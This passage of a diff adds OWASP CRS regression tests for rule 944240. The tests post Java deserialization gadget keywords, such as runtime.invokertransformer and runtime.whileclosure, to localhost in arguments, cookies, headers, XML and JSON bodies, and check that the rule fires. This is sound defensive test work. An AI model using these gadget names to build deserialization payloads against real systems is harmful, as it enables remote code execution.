runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.instantiatetransformer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-38 + desc: "Request header test 
includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.instantiatetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-39 + desc: "XML attribute value includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-40 + desc: "XML element value includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.instantiatetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-41 + desc: "Nested XML element value includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.instantiatetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-42 + desc: "Content-Type text/plain includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.instantiatetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-43 + desc: "Content-Type application/json arg value includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.instantiatetransformer\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-44 + desc: "Content-Type application/json arg name includes keyword runtime.instantiatetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + 
method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.instantiatetransformer\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-45 + desc: "Argument test includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.invokertransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-46 + desc: "Argument name includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.invokertransformer=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-47 + desc: "Cookie test includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.invokertransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-48 + desc: "Cookie name includes keyword 
runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.invokertransformer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-49 + desc: "Request header test includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.invokertransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-50 + desc: "XML attribute value includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-51 + desc: "XML element value includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.invokertransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-52 + desc: "Nested XML element value includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.invokertransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-53 + desc: "Content-Type text/plain includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.invokertransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-54 + desc: "Content-Type application/json arg value includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": 
\"runtime.invokertransformer\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-55 + desc: "Content-Type application/json arg name includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.invokertransformer\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-56 + desc: "Argument test includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.prototypeclonefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-57 + desc: "Argument name includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.prototypeclonefactory=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-58 + desc: "Cookie test includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: 
"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.prototypeclonefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-59 + desc: "Cookie name includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.prototypeclonefactory=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-60 + desc: "Request header test includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.prototypeclonefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-61 + desc: "XML attribute value includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-62 + desc: "XML element value includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.prototypeclonefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-63 + desc: "Nested XML element value includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.prototypeclonefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-64 + desc: "Content-Type text/plain includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.prototypeclonefactory" + 
output: + log_contains: "id \"944240\"" + - test_title: 944240-65 + desc: "Content-Type application/json arg value includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.prototypeclonefactory\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-66 + desc: "Content-Type application/json arg name includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.prototypeclonefactory\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-67 + desc: "Argument test includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.prototypeserializationfactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-68 + desc: "Argument name includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + 
input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.prototypeserializationfactory=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-69 + desc: "Cookie test includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.prototypeserializationfactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-70 + desc: "Cookie name includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.prototypeserializationfactory=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-71 + desc: "Request header test includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.prototypeserializationfactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-72 + desc: "XML attribute value includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-73 + desc: "XML element value includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.prototypeserializationfactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-74 + desc: "Nested XML element value includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + 
method: "POST" + version: "HTTP/1.0" + data: "runtime.prototypeserializationfactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-75 + desc: "Content-Type text/plain includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.prototypeserializationfactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-76 + desc: "Content-Type application/json arg value includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.prototypeserializationfactory\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-77 + desc: "Content-Type application/json arg name includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.prototypeserializationfactory\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-78 
+ desc: "Argument test includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.whileclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-79 + desc: "Argument name includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.whileclosure=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-80 + desc: "Cookie test includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.whileclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-81 + desc: "Cookie name includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.whileclosure=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-82 + desc: "Request header test includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.whileclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-83 + desc: "XML attribute value includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-84 + desc: "XML element value includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: 
"runtime.whileclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-85 + desc: "Nested XML element value includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.whileclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-86 + desc: "Content-Type text/plain includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.whileclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-87 + desc: "Content-Type application/json arg value includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.whileclosure\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-88 + desc: "Content-Type application/json arg name includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 
User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.whileclosure\": \"test\"}" + output: + log_contains: "id \"944240\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml new file mode 100644 index 00000000..abca823e --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml 
